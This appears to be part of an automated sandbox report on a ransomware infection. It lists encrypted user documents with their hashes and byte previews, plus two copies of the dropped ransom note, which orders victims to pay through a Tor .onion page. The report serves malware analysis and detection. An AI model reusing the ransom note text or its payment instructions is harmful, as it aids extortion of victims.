                                                                                                Preview: zK.......(._..6.._.@+.......l..`QzW..n.]}H1....($...m0.K..XE.....K.-....Q....`U./D.?.Od.|W.=.l..Z&...iN...........q.Lv.....s..7. czZ,/.<.hC.g&............[...[..p..m....o...v...'R../I..vl.....)....&.......9.e5..S":..R..........*....._L.tjD.Fh.C;..?=....T...'(=....3$.......5:..6..i..Vq8z!.\9.f.D. ..........Ib./.y.X.{..L.6.......vR.r..T..e..=..A.5M..L..Y...t..V>.r<.....B6.G./_<_..2....#...a....I&.E..Z.3oyl...Q..........2...=n.$.Q.<.oR.*...K.......F.[.........a~..... ]....b....!...%.8.,.......:*.<.._.1..?..W..1)......oR.=1[..=.z..4'...^.&%n..v...x...."^,.(:7k...y..B9...|fTDn..~.XX...bc.;...$...2........1..Ad...bBT....I.3...r8...qb.U...{M.U.....o.....H.".....;...n. ~y.qNv.......'..l..U.s.t..t..6..N6.Po.@.Z.e..1.`........+...C....m1#td.k.w.. m.c.UBW.2..t.[.....^<{.R/....1.....`....6......*.!?.dN9.K\.."...]....|.>A..........K.S.E...F.p3c...?.{u......&1v..Hk.....K3.... zG.....f......X0....D..F.f...C........m+.T.eQ:a.[..J.2.R.U...SZ....t?
                                                                                                C:\Users\user\Documents\GAOBCVIQIJ\SUAVTZKNFL.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.855349656624837
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ec+dAzS4bQzmVegh2G2XsZAwjHKu5yPscirU3xCVaKG0XfVoDFSRNo:eIzS4E8/2PyIde6xQtvVGFSro
                                                                                                MD5:C2270450C8C2C9CFF866C457D047D015
                                                                                                SHA1:02557E1963C07A0E67A092C599A024A653B6B12F
                                                                                                SHA-256:32F53747361166DBED6381E4D123D39555073ACD9BCAEA981CB972EF10E84D21
                                                                                                SHA-512:FAEA9413862A322392763C48AB439E92D2558BEEAF500E51FD051C99292D8840FE569E92306E3C5362941A6570F7616AB488621B40B8267F6D65CCC156078F38
                                                                                                Malicious:false
                                                                                                Preview: .MITS..qg ..xt|.^GwY..K....%.rZ.t.u...c..%..7z...|.lZnk.c......S...';}M.5..z...!..+..]....#.\1"..d..Y`R.3.X6..<g-d..`5....U..6..-..J....$5..r.....(...........%..e7)......I..A...-.r..R..._..n.@.$GOK...5.AS..3.{....Z..*J..._a.....q.L5....X......`.mL|...b...8.K...t0..nf[.Q.xv..._6c3.....}....UX.#1_S61G!.la...B..(.......>.Z...-..?.^.o..u......i..`WU..Jl...w..}......w`XJ6P..b...b....K.._...,...qW.vZ.....`...._fk....7...m....WYeQ^.qm..W_;...7%n._..*!..c....%.......|........s...........3../...`4.=~];...H[d....Vac$.z......."am..m.zZ&.c>).TR.h.A99...~........'......h....P.@.Z..;-..)@<...)..I...........L0...p.}.~...Bw..9..\...Tw6s?..:4..........|.;DD..6X.Yg...#..=.E..E.?..P.q2).....R....7..u..*....m....IN....F.]..{$.tk"0.. F......"...?.X...U..T.}.Rv...m.z.`...4.*....o.c..<....f.@.p .v_L.q...@.....f.n.2.-.,........}P.........&2..$.'..s..t.yj~6...;...u....T.t-P'r..H.C.^?R.7{.h..i.I,.2..@.0....{..u .`.....X..x..EC.8.....N.h...P..........;..
                                                                                                C:\Users\user\Documents\GAOBCVIQIJ\ZGGKNSUKOP.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.838864271228105
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:WkD4C0ZQ/bcxTTZ0mMPNM4ZMMkwZs3TAiRoNnpoiqlx2wHQWsS/xK/Y6:dD10ZaoxT+xMg5K3TAOEpXq6wHDjKB
                                                                                                MD5:29666BA84127F76B6151A1DA02C61F8D
                                                                                                SHA1:DE207E28016C1C04EF56423F0E8C66540C7F768A
                                                                                                SHA-256:2E35EA77F64164860F6FC01A89C923B7E088DF07FEF20BA7E1E35840349BEFBC
                                                                                                SHA-512:267A2307A51F39C3C646FA9124593E40F3C4D7C4785A0200142AAF98EB3F155CF471C6ABC9646FC0C94458C4409EB77605531E259FCF156DFD7FBAB5A2B6B972
                                                                                                Malicious:false
                                                                                                Preview: ...0..".<~^2........l.t...?....'J&...<.4&.1...../..N...vz.[U.*.t[.......,...l......*..?..MA(.{....F....@.u0..WY.<...I.)......H....<.-!6.3..F..l....Q0\c./...y.r.......^..o..z..S.....z..r C).hLl+.0%...(...U...w...x..[JT......Ez. .{..$..8.).Lbi..u..d.O.....<.do...R...u4..?..]..le4.>.B...bw%..>.DJ..(pe....|x5...S..^...<.a|x....n1.....-..W.5........A.{..4.T....q.4E.*..~`k...o.rt..w.U.p./..&......n.){_..%+Dj=.o..9'.i.?...J2....Q.b$2.4.....-....G.....=...o..a..EX.A.......dlW3..s...P4.o.1.z..j.....:...>.2...H...s.r!...^........./.Y...F..s....o.....i.y...^.1'/.....*^.$..9.i"..^.[..F....h....[.2.H....G.).5.!}...A........@.G../..|L..+..!E9d......F.....M-\.1C...t*\!#.1......<n.K?..#....X......o&...$....}9.....".._...g.9..Mhi....X&...S..#].8hsV.}.W.>..UA|zO>..k....H.\8J....)..9h.....'....^....cd.O.......e:.p.m..*.Q..{u.._n,..2.z...n..v]C.$.....].-.[.|.%...Z2."v.[.0...t b..xz.c.....^......w....zAX.kE..WZnT?]Eoh.2..b.l2.[c..d..W.E..."..,O{W..I"..o..N..G,....,
                                                                                                C:\Users\user\Documents\GAOBCVIQIJ\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Documents\IPKGELNTQY.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.849104880170825
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:/3HeeNeOQQzfoyCr9Vsgb4QOrRDjknium6mMNNi1IgSV3lInTVE1bvnp2Xq:veGeTS3C7sgXmlYoNANWSn17pCq
                                                                                                MD5:84EE142367D1937B82CDE97EACC1CDFE
                                                                                                SHA1:4195DE4FAF9FE70431F7F6FA2E001DDDE4E5493A
                                                                                                SHA-256:0C5CE2F5AE7CD59764FFCB185704C693802C20853F14C9C9B11FB5A0FFF80620
                                                                                                SHA-512:3CF4F87EB47AE0405EDBBE552BB12E511F83447DF9641721F0C1095721A638E9BCD2BD422298E15FF40D95817340F9A7BD1CBAB679BB795B93525198F4080502
                                                                                                Malicious:false
                                                                                                Preview: :...+;.K..3.s._.As.3.N.d.~.<<[.J.{4...|.1..S.V..n...%!.N.TC..O.8V..d...C.5q...v..T"E....A...l...-......Rh.D<..S..!..K.^....FQ.I%.....u.n...z..D..P.f5..Y._.....0. .T..Y....}..v.F.l.0..a.11<..a).L.Ry.I..A.1.U.M........J.D.....h].../..#....@n.....HxR..L..-..OU....W..........M[r+...%.l.8u....._..G..,.....c0%..G3..r..9j_%.......*Dx}.>pg........X5!.r.X..o..'~..4.....<_<"m#.NE......^...{T...'...~Qt...`.SR3.X....@...-Y...."..J..C..,..]......'.yg.F."..e....?%$.../.O.~.\.0.$L..k...:Y..j..6..]-.......a=.4.%..W.{:T.......w......)..M..j.w.?U.zK.l.{....9:*.;.../.u.1\......."..-..'..>.;..:.l...u..Tk&3P..u.......Vdz.b.]..+.<...WE.H..Q..Gm/=...G.....B..)<Pg.Z..m...@.;.B...y|....V....p.l.}..j..,C?X..X$..W...:...K...1........C.>.p>.`.=....U.].o.~F9]..{...\..=...Q)...|BO..Gq.....%?.. .Fb<....\R....]v..2=.]W.q.....p<D.....z.1..J....K...H......"..N9N.&...G4Y.)......T.:i.[.e.../.2...(....A/*.I^....P.&..~.M.q5OT...+.01/...H...h.ls..LU.......a..B.IY...A.DT"..`M.3.
                                                                                                C:\Users\user\Documents\IPKGELNTQY\GAOBCVIQIJ.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.83801119096127
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:JfF4FuGyKM32Z6dClRR8wJTUKvcAj7ILuMJvXeWcbgEDUWjrY4:JIuGDMGXR2dJveWcsEDUQ
                                                                                                MD5:E1A39535229201C1A4D1A16A057516A4
                                                                                                SHA1:FAE34EA8D53649CB6E09905F17E1D044654514CA
                                                                                                SHA-256:C712814117571CB382D10B55F5D34DF380FD7FD5DBE9DCCF8C6993D3925516E2
                                                                                                SHA-512:D11118282C43C823C51087888A4C9FC24A1925F57FEA0665C7C062846C31DDD06903277A0626CECE07C2A09A25C9B44A6515E243189A54DD6AEA0FF0BB579B14
                                                                                                Malicious:false
                                                                                                Preview: ..rd..5.Y.......}......sT..1s....y`R<.@...y+].5K..#....d.p.h..bX..r.wY...J..R....-3@.|rS..T.] jz.....G=g..#ZW..v.G..*.%... ...)..c.J....gG.t.J..B...ft[.?.1.j.u....SUb....@W.7...)..._..B..[..S...DG........C.o.@. ....V/0Z.l..9Y....g.l.....o.r.:C.3.3..A....<....v....q....s.%..0.#S...i... ..../...js...7.f.*..vS}P...-Nc.d*>.:..C@{.d..p.Qn..&@&s.ft....V.3=b..[.9......J=_....@'vb..@.^.^...9~......_m/q .Mci.@.w/...gz.h...#mDcP.._.p>...'...d...R.7......{<x{..m7[.Zu[L...Q./.....N.yj.7..*l.6..D'Q..~........@.....g.../.PU0..q.4.R.w...skt...,.O...#.`...B.@.r..nJ..........=. ..F5......y..D...^+v....r...1..a..Ay. .9.._.......i.....<.%r..D..].=..c...m.O|.e........_....9jfh.v.....[8.......N......$.P..b.a..2.Gm/2u..\5MJf7td.....#..$.9fIlm.'EK._.B.;4.r.".O...O91.......|W...=G.~z7....KT.}.Z...C-.}B0.[+.MxegqzW..n..0p_Z...D...-...}.9~[J@..p....)....2...'>.+.=..Wbl"k. ...Q.w...R....\3k.!smA...=.^.@U.D....9...|aMra=@.=fu.pc6A...D.>..B7...... .v.....`8..N.QQu.....
                                                                                                C:\Users\user\Documents\IPKGELNTQY\IPKGELNTQY.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8449275105429175
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:I/c4zq7mFP630hxA8MU2Hec/MSDoabThqjBaykivMqBG07TaxlE:I/LO7mt6320THecdDNtapEl1xu
                                                                                                MD5:8A5457553DBE4488146D72C29712DB0B
                                                                                                SHA1:7D4E83B375E48FF141C0AE12A0F133380E5964D0
                                                                                                SHA-256:C830828BE98E351B8DB97545F877552823BA539861F9899534266C5530F5FE10
                                                                                                SHA-512:88B3E7F11076A56E2BC6C2D1603D086E282ADE75EE9AEDDC75F07792E00EAEE608320201FA5C14285EC25231C4EC82490E1F3B31683EDA7A58437FA50947AB0B
                                                                                                Malicious:false
                                                                                                Preview: ..4.v.6J.5P..B..W...ZM...y.EtF{.LF.3v.h....zV._\.?.'....V........@X...o.x.d....P..&+...'..N.~..oU.:.V....#.U..s.~.....40l.u....c..<'.....cu).!^.'Ja.......u.*mu..C.BH..E.d.2..%7..m.HZ.WY.....A..'.r...]Mj.S....6....M.fK.{......[.lp..Md5RS..X....Ydt.GAX .C..\.c1.N}..eyf5x..y....../Z(......b...R=B.%...C.LO...w.F..S....sN......\$h...d~z...%...&P:...%...(D2l.............6........./..*~..3.1....1.m.O.+Vw..K..x..V.H.$......Oz}E^......h.4.......J._..........*.j'.......".".lv.0$.~..G....$9.7....t..^...E~..P^..V.u86._.X..$.1.vpS..;G%....%.y..z........=.j`j'p.........=.Hb.9...M.P.Z..S.6.7..C....1..}...%g'..._...Q3.H.<BA.....<e;JI.9:h.<.rJ."^......B.fY_%..............A'~G.....'........^.0*|C.....G..l...p}....v..W2x..`.{..t5.7,.Z.mA.A.).7..0.....xq.7./.V.k~......I.6..!....D...j)#....k.?e.......e..$.K...;..n.2.B..~ ..`|......E.."s^..........?..+8.6/Rl).9w5......P^\..d.W..|....8.q.....l...&J.....J;..K.}.w..z..`.C|.......p...>*.G...JXAu
                                                                                                C:\Users\user\Documents\IPKGELNTQY\LSBIHQFDVT.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.854672341016941
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:XF3CH18i9ViLuwjk0UTz88SSFdn6X/0KVG4b1Znrud1e5rCoCc:Xl8iLuUk0U388SSTn6X/0IG4b1prS1eL
                                                                                                MD5:6A30EF6CAE26A9662AE50C4643E4682F
                                                                                                SHA1:A17DBD41AF2F7D6A7975D883D3C28F4AA8299CF9
                                                                                                SHA-256:BBC4AAF36D84A5D46C42DFE7C94F1B9C78227938506C4474503D4D5F2492D35A
                                                                                                SHA-512:DD68896CEC0E328C0A6541BC0776A86226C5854E408E8FAAC4F8734FC61C0040496A503009B6AEFC83E4778A38CDC5BBAC42D59C57533F3071A60A432C2A61B5
                                                                                                Malicious:false
                                                                                                Preview: ........O...O.1.6&..K...."....yd98c..Ht....lF...x....Y..j.1g.....z?qZ..E...Q..i&.B.l...I.|.X.......C.!....%.A...v$..9..H....`.......M60.(..=c.#=.L5.dh.b...4C.Q...N.B..*(>..fO... h..;.].....B......1m@$......3{...TQ....V...0..6=)...~......+=.K...nU.....C./........b....~..U...Uu.M.."y2.D...".....O.M.5F.Jh=..L...;..)9..+D....^r.\.[r.........2...m.....c.b1]......../.^..LP....z56t.........Pfs..ql(.m..........3.xJ.)\...~.......FV..d..H...E..S..i`..d...K.ZA..8......4.... tnw....F.L.\.2.?..5....p.fc...|^....:s5j..]..j..+..N.....*.....k.....ab.?.".1N..`[. 0....}.Bj.....W..?&m......"L..Lb{.<W...T;..p.'....D_..y...W....'...ro...=........b....7....u.....v...R!$(.5(`..Qj.....{`$...*....|m..5..f.1x!.....1fI..Ix........i.......d...4....Cm.7..).T.#`......2.l..V.c...SQ....hL.U.~..y.....8i`....~.5...L1.3=....U.p/t;k.m.=XF.N1w.r....x.|....KW..Q..Ia.RZ,..y5.<.].;X;..9...q........M.G. c>G.....}.../r...8C..-YraA4?.3-....C.)iLE...p..D....#.w;.o..SXz.?p.d.i`
                                                                                                C:\Users\user\Documents\IPKGELNTQY\NEBFQQYWPS.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:PGP\011Secret Key -
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.87328620159484
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:e/vDLGlDuzb4FY94OXSjqzEvM0T+C8meJDnJUCbNUoBdb3WbbKHr33kGoTEC/V1:ttDYeiS+EPTT8mwnJFB5mK38TP/r
                                                                                                MD5:DBC6736D670F83F948978146B2E160FD
                                                                                                SHA1:7041CCA8E03F7072755EBC38274244BE5398502F
                                                                                                SHA-256:EC51B492735BE32809647EA0EE7E3639C9130543E2BB70DE8215A311A4BAC040
                                                                                                SHA-512:9BE9F92E22F421D884D40E09741FED4300A2F1D201DF981DBB5FA180B3835BD4B189D6357650803DE2498BB44D217761B9EC6EABCD47FF0FCD7052CD2D758002
                                                                                                Malicious:false
                                                                                                Preview: ......gf.......D"}).[6W......8N..sM%WR.z..r.P..:...Y...8....J...v.~..W.s.h"..?..}Ze....O._....e.L......h.DRa.Z.....-.f+@. '...uI..Qw...dsx.....Y.`<.luS ..@....jsa.....T.o;....oB..g...~..^...@FP7.t.2>....D.w.=.F2\.....iv..4.R...'..K9`-.....,.5....u^..e.*..l.W.P.+....!..KB.7g.QP...00!.w.M......N....g$..i...r0..F....[..R?.......i.y=W.......-.<y.4*....C..Z...Z;....j.40.gsA.XO...N.:o1...r.9..O.T.l.@...$..p.........e....F....n....c..{(....l8-......#E....?....s.;.Uy..$c.0.E...).^f...;Y...c8FiHP.."6nV..G..\..._b_...i)...X..^....:@..N...Dt..5.......70v]....S/..u.>.A...........=|.a|.~./]..Q..F.O...ZoFn..V.0.........J...1E..{.....C...rO..!...4.E.w........j.n.R .q.N......Z~PLt..\....z........Xr....|.nE..1.X.b...`...!...h..R."..7..zzD'....e*...6..@...~.pR........si.K.T..+......$r... .......(1^xG.V.....R.h~..g.}..hIWc....A+.LSO..~UX.....Q..hN#.. ...;H]..c....}Y.......@S.@.P...%r...&....8(.5.'y?.j.o..@......q..]{;.h.....|MS...DqJnQ..N.f
                                                                                                C:\Users\user\Documents\IPKGELNTQY\ZQIXMVQGAH.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.857422952373003
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:KUqFQURZAqbOIBTW092ddJvTpV2IlM36N19AN5xYFpUvGsFY7GfMKCVQQ:Kfx/XbOfjddJvVcgT19ANLvr4GfMKCVN
                                                                                                MD5:50DBBB30E3A6CCCEB636FB7323530AE0
                                                                                                SHA1:1C28DE9ACABD851AF3D260C846AB3125CACA0E83
                                                                                                SHA-256:CAD82E01BF5F5C933DAD0068ADF267B7E0375758D48682642198D41BCD6D5A53
                                                                                                SHA-512:71BE186980C5F7660C5017D2710F29FE15F384C41844AA40E2FBF8377DEE92BDA0F00674C07C954AE9E4ED21D80C1DDF79B1CAF86B33C0983461E483ED521A82
                                                                                                Malicious:false
                                                                                                Preview: .5.o..X!/!..).....-.......F..uG.4....>..g...=&.qv.....:iE...}!.G..T....g..<...v[.w....|..A).....66....I4|.fZ....../2..(..w.<.lU.(eo..N..h........W..sH.j....,5...d.....^..P.S.r....5....p..*.- .?.)..R..Y9...i.].q..r./..........j.w5L3..Ia.S.&.......H.Y.I.5.$.$.4&A... ..Y...6=]./.d...-...../[...[..a..t...9e.?....{.<....FD.....VM.tC....U. ........Nf..Y0...?B.....$.;d.|).\...Z..yZr.<.{....s.....J..Rc.&6H...}.8.[.e.n.(......-..T.u.....T.iQb.3........,RPp../.W..&F..\....LA...qKK....7.P...j...C..O......7.3.on.....{.KLIG..H.>+.....D...s...?i$xtZ..d..9.d/5..r..W<.#(....?....l..H.L.N.q...X.DF]...T...4+.l...8X.O....|".px.p..E.......@}hX*sA..abw......<j....a_....6K.x..K..]B..Lz} ./PxE...,@Ss.....z...f.Z..E..*9...+.z>..\.oO2....;i..,..Q....:.8.E.A.6.....lh.1.w.gZ.......R.qK..(.$n......tW......Q$0....`...C4..~8H1.....',..5_.....s6...D..VT>.e.,y.....%..@....=...C.....Qq....4.."....^....:....'ya.We.p.gh.{6?...(3K.h..+.....!{8#...6Pg!.._.1...AL.....dO...;.F+....a8..L..C.|
                                                                                                C:\Users\user\Documents\IPKGELNTQY\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Documents\LSBIHQFDVT.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.854308235657795
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:5F1go8QgB2jbdRakvJJg8Jfz8ae1nNt5BuF/7rAzui5vfvUv1MttIfC5X7LZAc2:5t8Qg6vJ6Yfz8ae1NzBu9EBvKMzrj2
                                                                                                MD5:0CC7541588153BC7060E98CDF4D58825
                                                                                                SHA1:D2CBC5A518310BEC4C9101DC06E75AE5F143CBA3
                                                                                                SHA-256:51B624F322A5B831751E08339252CD2B0E70196D580B2E3372DE7367C562E6D7
                                                                                                SHA-512:92CBDF418277629AF529976321664312A006F753FC0455ECE0514BA2C47598098DED01C8092DFCEC3F4FB66CB4A998E12F076A38FF0D730D4589343AFB258BF7
                                                                                                Malicious:false
                                                                                                Preview: .....P}F..".c..9?.3../.g;..1.'.".A.g...J.......N._..b.z.k...DI.CX..%.$..... P...)7...#I.CYN~{m.<....&NW.d..9............p..?...]...hP.........y.ni1W.#hNd..!u$.X....x:..HA..{...v,1.Sh.F..@.I....s5.eW..:.VY...&d..!x..7...:uk.5..'..b..2..I}.g. E....B7.,k..d..]..zu.!.\\M..9...X..t..O....'......].1....cH{...T.....4...>.s.Ot......ND1.gE..dCIV.R.......y.=.....JDJw.o...k..V...J.........H.q#.h*..rCYVP....~R...'..co.../o...S{sq\'..O3...<.N..WG0....~....A.....i..:..S&..Z.1.S..g.a._.z.^.&lG....[.B.U..P..I.T...|.t......... .WG..f.<v..cT....En..G.....eR......a...~.t,.UVr.......83.P.}...%.;....E.a.8V0w..O...c.a.V..f...h.]_g....4.$.y..W.kS...Z.....~0...Sg..eh..Q..l.N....miU.g.g@..^..wQF.UH...D...%y..7..XD..........4&R...E..N.\x'.].$...7-@.\..n......Z..}0..%v..[.....R.o@."<K.X..^.h..j..h.v.".H#..t^.syy...:..N......n@..l.D..&G.......&.Cj.;:.Aw.t.....+...iV..5..eb.^*.#.n7C......;h....g..2>U.y.h:..O.=+.>/...rf...M........*%.aP...$....e|.0/K<.y.....N..
                                                                                                C:\Users\user\Documents\LSBIHQFDVT.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.865632064719489
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:qA3MfNkf+waDkNkiUQ2mh0r3XVwF3Rh93dEuJu4xTiq/q36SxkJS4Cq6VXnlBX:H3M7wrk97XVwF3RhjEexTiq/q36SxkJ+
                                                                                                MD5:CB38AAA30AC04E852F3ECF452B30DAFA
                                                                                                SHA1:FFE30DA16D6EABE292F153264C0165FF5D25C5D3
                                                                                                SHA-256:6274A629AE9BDEA38E10955C72717720BFEC222790EF6103C1732A571A1D8605
                                                                                                SHA-512:A2795FBD8A6BBE5B8356CB59C8A4BC51543EBFBCEB06F2A6A0C4903E3347D77898CE26DB3AF494114DA09D35BD0CF16EDC11C58BCCB6F8C63646F66930AC7E20
                                                                                                Malicious:false
                                                                                                Preview: .#.nw....G...../.Y....wA......`.:...J.,...?.*...|;.Sg@k......vgi....T.lxF.oxR..O!.3....).c.v........2k*/.iT...o.?.`{.....3.\..j.....*..i3.!.....a...r......wN&w.c.(5..O...Y[s;zW..6........n..#.1ho1.b.....vw..7..TfS:;.......%....y.'.rJ..&.2...RB.m9.\_...jn.J..G.wv.b..........,.`wrQ..$.^.dA$...|....|o\........[x8...<.Y[<4.NE.?u.... .o.RV....lR{h..!L..... :.XQ..|#.[.\.!...7.v..}..[C.bNJ.....)...oJ4.B.M..Q.]S.....Xs<.>..i.eVd.8R.r.....:..h'.gB1w>M. Wg.?....;.eG.u........3GB. .....br*...>.n..JR..B....).^..)c./.....V%.w..../..%...u...LW..q.>......N;5L...MY|....1..=]....4A+..!..B......>......V\..cS.N....+@..(e@......qR}....,f.4..E.9...GcF...#...C...5......pr.d.4..g..}.P@.~.U...3R..|..........*P.G.R............!9t..l.....MX_...Z.E.c6S..7.FpHc.i..."s..........L.d.,$.......m...w.;...h..........;..p.;...!.-..U>..U0j.q.1....F8M...%}8.2+.B.>.im...Y.&1|B........]i.e$...".2..Y8.T..JV....P.F....$4.^jU..8 .....3.'Gf.Qg.`I..H_..J.....S.m..).T/~...o.c.\..N.
                                                                                                C:\Users\user\Documents\LSBIHQFDVT\EFOYFBOLXA.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.84353416729329
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:7iOT1tWE0nsSdH+5w0NUD0kg8FUJM8jX17/owwBlQLP1Kr6J6IGs9jJoj:WOTzWXNHs00kbQMAdoRKO6J6wlJs
                                                                                                MD5:7A96B3D71CC512798133FBF728EDD70A
                                                                                                SHA1:A4F3757595F5DCBEBD4D98587AB5EA7932995A7F
                                                                                                SHA-256:3A564861EF10BDB49625412267CB21A4A6E19BDF73EFF8BEC14CB611016281B2
                                                                                                SHA-512:5B1403D4740427F8A9B1AE40F49C3DDE3CB6DAB4079134E2FD2D4BCB91CF52E06DCA9CF0253AA64DE227F77941BF342A13A0973DDCDDA5077CE14CAF108210D3
                                                                                                Malicious:false
                                                                                                Preview: m.C.. .....Qx"nH.9.3#Q..T..kb..._..^..mzK..}'L..A.....6....2mg:...:$.o.g.XP,.-{K).N..?{.../..9..#.)X^R.....G......i.C...yU..s...BEt..FSj.Q......Tt.?G)Z..4............p.Q...Dy.,..6..}..Vs.56.?~.....W..5...h....Q....;PN%(.....f25(.%Q~...E^.vz#2.6O..<...g....j.^.<_.a....?.O...8.../....\.X..a.k.mB.q.....NB.$,..@.}..Eyz%j.]....u...C.J)....`....._'....W.].....l.iiL<A.../...V...7.$.N.DU.k.M.vz.v..?E.C..y.@..$r?J.a.pt........?...............*.S......1x.`.....&......n..Ex...v...Z.($..^b.:/U.o7..$.4.E..ll5.G.JNixn..Y.....T4_.......,.....(.....J.HG..1..+=V.G.....s..0m..Z.Y..w.Q....YT..>$...*.,..~.......T.y..B..^.y......z,h..aW...6R.]..].....1G.".!wXx.K~H..1...:.,...r/.Ng4.v...ck.w..`..iQ.Y.8.>./...[.Mpl.6.S..29Q..e/[.).s.C..Gh@. .1R...............Wa...VpSN|.,.W|.0bA...VV]N.3.i..4.@...%.......[..?.+$.i.)t<.........j.5..E*...M.V$..sl......>.p.F....'m}..$&...U.!.....0.....5sc#.a...<..t..QO5..D../........7.I\..L..&o..H.....7. ...t.y.b...!.........)..
                                                                                                C:\Users\user\Documents\LSBIHQFDVT\LSBIHQFDVT.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.852486498732989
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:1tN2IssPgs9njRs65MWxwA8WjE9DMdtC5Qfp8hExKCsOy4tuzJ:1tN2Ijoszs6Xn81MdwKp8Cad0u1
                                                                                                MD5:73593ACD06CE4557E4CAF699A261455E
                                                                                                SHA1:C97E82C964E75D78ECA9AEC9A8085F2C1A768C1E
                                                                                                SHA-256:FABAD5AB3A4FE029C06C1F727323FDDC726F8B8D3273585790301A770A894092
                                                                                                SHA-512:7B95A68ED04E963D860DA13F8DB17A8B569F27548A42AC117F817D3C7B86B4F1FF06E7284591B092A768BD3F831FCEC4169C32258639530580A85130A74FAC10
                                                                                                Malicious:false
